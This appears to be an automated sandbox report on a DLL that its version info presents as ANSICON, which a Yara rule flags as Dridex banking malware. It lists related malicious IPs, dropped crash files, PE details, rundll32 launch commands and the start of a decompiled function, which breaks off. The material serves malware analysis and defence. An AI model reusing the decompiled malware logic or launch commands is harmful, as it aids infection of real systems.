HDC Information:	Successful, ratio: 96% (good quality ratio 93.1%) Quality average: 80.9% Quality standard deviation: 24.9%
HCA Information:	Successful, ratio: 87% Number of executed functions: 24 Number of non-executed functions: 7
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, WerFault.exe, SgrmBroker.exe, svchost.exe

Simulations

Behavior and APIs

Time	Type	Description
23:45:20	API Interceptor	1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
159.203.93.122	gsG7jGFk3I.dll	Get hash	malicious	Browse
	IHUVPJ4hXu.dll	Get hash	malicious	Browse
	CTkT1fRtQv.dll	Get hash	malicious	Browse
	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	qMus8K6kXx.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
50.116.27.97	gsG7jGFk3I.dll	Get hash	malicious	Browse
	IHUVPJ4hXu.dll	Get hash	malicious	Browse
	CTkT1fRtQv.dll	Get hash	malicious	Browse
	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	qMus8K6kXx.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
94.247.168.64	gsG7jGFk3I.dll	Get hash	malicious	Browse
	IHUVPJ4hXu.dll	Get hash	malicious	Browse
	CTkT1fRtQv.dll	Get hash	malicious	Browse
	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	qMus8K6kXx.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITALOCEAN-ASNUS	gsG7jGFk3I.dll	Get hash	malicious	Browse	159.203.93.122
	IHUVPJ4hXu.dll	Get hash	malicious	Browse	159.203.93.122
	CTkT1fRtQv.dll	Get hash	malicious	Browse	159.203.93.122
	BJKPKLUPiD.dll	Get hash	malicious	Browse	159.203.93.122
	RuRxpMUPN7.dll	Get hash	malicious	Browse	159.203.93.122
	qMus8K6kXx.dll	Get hash	malicious	Browse	159.203.93.122
	gsG7jGFk3I.dll	Get hash	malicious	Browse	159.203.93.122
	15sV4KdrCN.dll	Get hash	malicious	Browse	159.203.93.122
	Ce28zthEz1.dll	Get hash	malicious	Browse	159.203.93.122
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	159.203.93.122
	1UmI5PSg3K.dll	Get hash	malicious	Browse	159.203.93.122
	9eYYTTlVYi.dll	Get hash	malicious	Browse	159.203.93.122
	Ce28zthEz1.dll	Get hash	malicious	Browse	159.203.93.122
	15sV4KdrCN.dll	Get hash	malicious	Browse	159.203.93.122
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	159.203.93.122
	1UmI5PSg3K.dll	Get hash	malicious	Browse	159.203.93.122
	9eYYTTlVYi.dll	Get hash	malicious	Browse	159.203.93.122
	9JXXdpfiQm.dll	Get hash	malicious	Browse	159.203.93.122
	t4KzTUSzkx.dll	Get hash	malicious	Browse	159.203.93.122
	POQ6m91rE7.dll	Get hash	malicious	Browse	159.203.93.122
LINODE-APLinodeLLCUS	gsG7jGFk3I.dll	Get hash	malicious	Browse	50.116.27.97
	IHUVPJ4hXu.dll	Get hash	malicious	Browse	50.116.27.97
	CTkT1fRtQv.dll	Get hash	malicious	Browse	50.116.27.97
	BJKPKLUPiD.dll	Get hash	malicious	Browse	50.116.27.97
	RuRxpMUPN7.dll	Get hash	malicious	Browse	50.116.27.97
	qMus8K6kXx.dll	Get hash	malicious	Browse	50.116.27.97
	gsG7jGFk3I.dll	Get hash	malicious	Browse	50.116.27.97
	15sV4KdrCN.dll	Get hash	malicious	Browse	50.116.27.97
	Ce28zthEz1.dll	Get hash	malicious	Browse	50.116.27.97
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	50.116.27.97
	1UmI5PSg3K.dll	Get hash	malicious	Browse	50.116.27.97
	9eYYTTlVYi.dll	Get hash	malicious	Browse	50.116.27.97
	Ce28zthEz1.dll	Get hash	malicious	Browse	50.116.27.97
	15sV4KdrCN.dll	Get hash	malicious	Browse	50.116.27.97
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	50.116.27.97
	1UmI5PSg3K.dll	Get hash	malicious	Browse	50.116.27.97
	9eYYTTlVYi.dll	Get hash	malicious	Browse	50.116.27.97
	9JXXdpfiQm.dll	Get hash	malicious	Browse	50.116.27.97
	t4KzTUSzkx.dll	Get hash	malicious	Browse	50.116.27.97
	POQ6m91rE7.dll	Get hash	malicious	Browse	50.116.27.97
GLESYS-ASSE	gsG7jGFk3I.dll	Get hash	malicious	Browse	94.247.168.64
	IHUVPJ4hXu.dll	Get hash	malicious	Browse	94.247.168.64
	CTkT1fRtQv.dll	Get hash	malicious	Browse	94.247.168.64
	BJKPKLUPiD.dll	Get hash	malicious	Browse	94.247.168.64
	RuRxpMUPN7.dll	Get hash	malicious	Browse	94.247.168.64
	qMus8K6kXx.dll	Get hash	malicious	Browse	94.247.168.64
	gsG7jGFk3I.dll	Get hash	malicious	Browse	94.247.168.64
	15sV4KdrCN.dll	Get hash	malicious	Browse	94.247.168.64
	Ce28zthEz1.dll	Get hash	malicious	Browse	94.247.168.64
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	94.247.168.64
	1UmI5PSg3K.dll	Get hash	malicious	Browse	94.247.168.64
	9eYYTTlVYi.dll	Get hash	malicious	Browse	94.247.168.64
	Ce28zthEz1.dll	Get hash	malicious	Browse	94.247.168.64
	15sV4KdrCN.dll	Get hash	malicious	Browse	94.247.168.64
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	94.247.168.64
	1UmI5PSg3K.dll	Get hash	malicious	Browse	94.247.168.64
	9eYYTTlVYi.dll	Get hash	malicious	Browse	94.247.168.64
	9JXXdpfiQm.dll	Get hash	malicious	Browse	94.247.168.64
	t4KzTUSzkx.dll	Get hash	malicious	Browse	94.247.168.64
	POQ6m91rE7.dll	Get hash	malicious	Browse	94.247.168.64

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_df981a55c8f8470f11a916e355cc03ffb76ef3e_160cf2be_0597fa7c\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	9234
Entropy (8bit):	3.760123548941686
Encrypted:	false
SSDEEP:	96:y3VQWVuAXyIy9hA2mC5Q56tpXIQcQ6c6n+hcEZcw3P+a+z+HbHgYF6eugtYsaV9p:pHNHUb+hjbjlhq/u7s0S274Itb2p
MD5:	B435244AFACF2765992D0279E23F845C
SHA1:	A476BC2B8C8C7995B092DB732F07B6FDDF047F03
SHA-256:	BCF2CB822B62F3BF029E0C0BF37E9D5373182F7DFEE315EDA20ADC64FC17E98E
SHA-512:	46D0FFD531216F4617A90145F1516E7E74EA97B7259B34A9680C436B7081F85EC5D33143CCC28E64BC710A4717F245D41C2F1FF689AA5EF3D2C901176C13477A
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.3.3.7.4.7.2.7.4.5.5.6.8.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.f.3.9.1.b.9.-.0.4.a.a.-.4.7.b.3.-.9.d.e.f.-.7.3.7.d.5.a.2.3.5.a.6.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.0.d.f.7.f.d.-.9.c.1.5.-.4.6.6.a.-.9.5.0.1.-.2.4.3.5.b.4.0.0.6.b.b.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.2.8.-.0.0.0.1.-.0.0.1.6.-.e.9.6.a.-.5.f.a.5.b.0.3.5.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.4././.0.4.:.1.0.:.5.0.:.5.4.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD81F.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Apr 20 06:45:29 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	38174
Entropy (8bit):	2.1828382278060547
Encrypted:	false
SSDEEP:	192:3myOFQKFKXgObjjYx/fZ9nKGL8b02FRkaDzN0L:2yOeK2Vbnauo2FRkaSL
MD5:	C9E49A6BE50823BBAB39396EE7BBB1EA
SHA1:	AB4AFD9B917795E15AF30BAE0BCA7B272B3E1A82
SHA-256:	45E887953DDB3C304EB40A976E69E6E3CC8486EE66248E5F5CAFA31097260716
SHA-512:	D1E27B9799071794D437926084357E5CC68639C1A7F068F8FD4F7AFC2F6F49FEA9FA4D7802AB05E9F04F1009AF21A7994AEAD61A33BA2049D124AF1371EE7804
Malicious:	false
Reputation:	low
Preview:	MDMP....... ........x~`...................U...........B..............GenuineIntelW...........T.......(...[x~`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE187.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8366
Entropy (8bit):	3.691468608896033
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNipK/6tKB6YIbSUKlgmfyPS1kCpBN89bRqsfo7m:RrlsNipa6tKB6Y0SUKlgmfyS10RJfp
MD5:	CCC41A644F3BE0BFB6A8480ECC3EDD04
SHA1:	49BCF845C541E74C45718522632C28F20424C71A
SHA-256:	D5E75A1163D617E922B606FA7B11B9FD6C76AB3F54D5FEDAB6D30C69E2F766FD
SHA-512:	CB7503876EAE81DDACD2A026DF2060786EF9F59B3779E7460BB52EC2E41AB99B5453E34C74DAE791475B0D5B02AEFB1BC47A50E11BF21847DB67ACC723310F37
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.2.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE502.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4658
Entropy (8bit):	4.4272761096432305
Encrypted:	false
SSDEEP:	48:cvIwSD8zsvrJgtWI9uwWSC8B6us8fm8M4JVpFg++q8v7jgWKcQIcQw6UrUd:uITfvFhJSNUuRJjK3jKkw68Ud
MD5:	1C6BFB000DC18CB37C9A024493F31316
SHA1:	1827233FFAF2FABDE126180F1013703D85D3B0A1
SHA-256:	61A60CCCA2DFA61B3C83F481543DEAE95664E502EA72DAA573856557D5A8804F
SHA-512:	83CDF84550FCA676FB4134296DD288F09803CA92E430E97BE2ADF5D696306CB98A2512002CB288AF9A0E6A1ECAB6C417F8E9DEA721D053397FABA7006091D729
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="954236" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.5485616542261464
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	u3A1eWFqLE.dll
File size:	163840
MD5:	13272e189ce1c61b9a7c3660ea94ab2a
SHA1:	3593c7bb4229f1e822839c11ab3713c970b584e4
SHA256:	2e3dc149c4384b79a6f19305efa6762602100b568c4a73b88ce3b714644ed849
SHA512:	cf50dac59f240c944d8cf68cac68fc4513e0caea05f386f3b7ab741fc43fb6a2c49d3c358be76ba80406bd4f28ff6926f68c3748b48a3aeb4a9fa842696b248c
SSDEEP:	3072:sWX2IjzzpM+PncPeY8+O3AU3HRIHPh3UGfXy0BHNkIv/ScbQQ2y0iNM0+y+N0tc:s42IfzNPnoeY8j3AsHGPXpHNj6rByM3
File Content Preview:	MZ......................@...........................................[}..[}..[}..[}...}..@.2..\|..=.T..}....S.z\|..@..._}..\|...T\|..V/C..\|..V/E..\|..Rich[}..............PE..L.....}`...........!.........f.......D.......P....@....................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x424410
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x607DE4E0 [Mon Apr 19 20:15:28 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	b84fd50f2389cfd5bd83e2cf062986d1

Entrypoint Preview

Instruction
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
sub eax, 00002233h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
cmp edx, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
je 00007FC21C57E7ABh
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1001	0x0	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2768c	0x59	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x340	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2d000	0x14c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x25040	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x25000	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2356e	0x23600	False	0.761560015459	data	7.55877156847	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x25000	0x2842	0x2a00	False	0.791573660714	data	7.53164670284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x28000	0x3588	0x1600	False	0.783380681818	MMDF mailbox	7.34765964879	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x340	0x400	False	0.390625	data	2.73456990044	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2d000	0x14c	0x200	False	0.62890625	data	4.21021599876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x2c060	0x2e0	data	English	United States

Imports

DLL	Import
KERNEL32.dll	CloseHandle, OpenSemaphoreW, LoadLibraryExA, GetModuleHandleW, OutputDebugStringA, GetProfileSectionW
OPENGL32.dll	glTexSubImage1D
ole32.dll	CreateStreamOnHGlobal
USER32.dll	TranslateMessage
ADVAPI32.dll	RegLoadAppKeyW

Version Infos

Description	Data
LegalCopyright	Freeware
InternalName	ANSI32
FileVersion	1.66
CompanyName	Jason Hood
Comments	http://ansicon.adoxa.vze.com/
ProductName	ANSICON
ProductVersion	1.66
FileDescription	ANSI Console
OriginalFilename	ANSI32.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5928 Parent PID: 5700

General

Start time:	23:44:43
Start date:	19/04/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll'
Imagebase:	0x3a0000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4652 Parent PID: 5928

General

Start time:	23:44:43
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5612 Parent PID: 4652

General

Start time:	23:44:44
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1
Imagebase:	0x8f0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1112 Parent PID: 5928

General

Start time:	23:45:20
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',ReadLogRecord
Imagebase:	0x8f0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000006.00000002.496447134.0000000070561000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 1496 Parent PID: 5928

General

Start time:	23:45:22
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5928 -s 420
Imagebase:	0xa80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 5612 Parent PID: 4652 rundll32.exeCOMMON

Executed Functions

Function 705707CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E705707CC(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t152;
				void* _t155;
				signed char* _t156;
				char _t159;
				intOrPtr* _t163;
				void* _t177;
				intOrPtr _t186;
				char _t187;
				void* _t192;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t208;
				void* _t209;
				void* _t211;
				void* _t212;
				void* _t219;
				void* _t232;
				void* _t234;
				void* _t237;
				void* _t240;
				void* _t243;
				void* _t246;
				void* _t250;
				void* _t254;
				void* _t255;
				void* _t257;
				long _t258;
				void* _t261;
				void* _t264;
				int _t267;
				void* _t268;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t278;
				int _t280;
				intOrPtr* _t284;
				signed char _t288;
				signed char _t289;
				signed int _t293;
				void* _t314;
				void* _t319;
				void* _t355;
				void* _t364;
				void* _t369;
				void* _t374;
				void* _t375;
				void* _t376;
				void* _t377;
				void* _t378;
				void* _t379;
				void* _t385;
				void* _t392;
				signed int _t397;
				intOrPtr* _t400;
				void* _t403;
				signed int _t405;
				void* _t407;
				void* _t408;
				void* _t413;
				intOrPtr* _t417;
				void* _t419;
				void** _t421;
				void* _t422;
				void* _t423;
				void* _t424;

				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t423 = _t422 - 0x1e0;
				_t407 = __ecx;
				_t152 =  *0x7057d1f8;
				if(_t152 == 0x16a9e13a) {
					_t152 = E70573558(0x30);
					 *0x7057d1f8 = _t152;
				}
				if( *((char*)(_t152 + 0xb)) == 0 || _t407 != 0) {
					_t408 = _t423 + 0x48;
					E705735D4(_t408, 0, 0x11c);
					_t424 = _t423 + 0xc;
					 *((intOrPtr*)(_t424 + 0x48)) = 0x11c;
					_t155 = E70572F94(0x4bcc7cba, 0xa7920a3, 0x4bcc7cba, 0x4bcc7cba);
					if(_t155 == 0) {
						_t395 =  *0x7057d1f8;
						_t156 = _t424 + 0x4c;
						_t288 =  *_t156;
						 *(_t395 + 8) = _t288;
						_t289 = _t156[4];
						 *(_t395 + 9) = _t289;
						__eflags = _t156[0x116] - 1;
						_t389 =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xa)) = _t156[0x110];
						 *(_t395 + 4) =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xc)) = 0 | _t156[0x116] != 0x00000001;
						 *_t395 = (_t289 & 0x000000ff) + ((_t288 & 0x000000ff) << 4) - 0x50;
						_t159 = E70571094(_t395);
						 *(_t424 + 0x198) = 0;
						 *((char*)( *0x7057d1f8 + 0xb)) = _t159;
						_t355 = E70572F94(0xd0443458, 0xd8ece5ad, _t159, _t159);
						__eflags = _t355;
						if(_t355 == 0) {
							L12:
							__eflags = 0;
							 *((char*)( *0x7057d1f8 + 0x28)) = 0;
							_t163 = E705707CC(0x7057d1f8, 0, _t389, _t395);
							__eflags =  *_t163 - 0x10;
							if( *_t163 >= 0x10) {
								_t293 = 6;
								memcpy(_t424 + 0x164, 0x7057bc80, _t293 << 2);
								_t424 = _t424 + 0xc;
								_t392 = 0x7057bc80 + _t293 + _t293;
								 *((intOrPtr*)(_t424 + 0x1c)) = 0;
								E7056F620(_t424 + 0x24, 0);
								_t397 = 0;
								__eflags = 0;
								do {
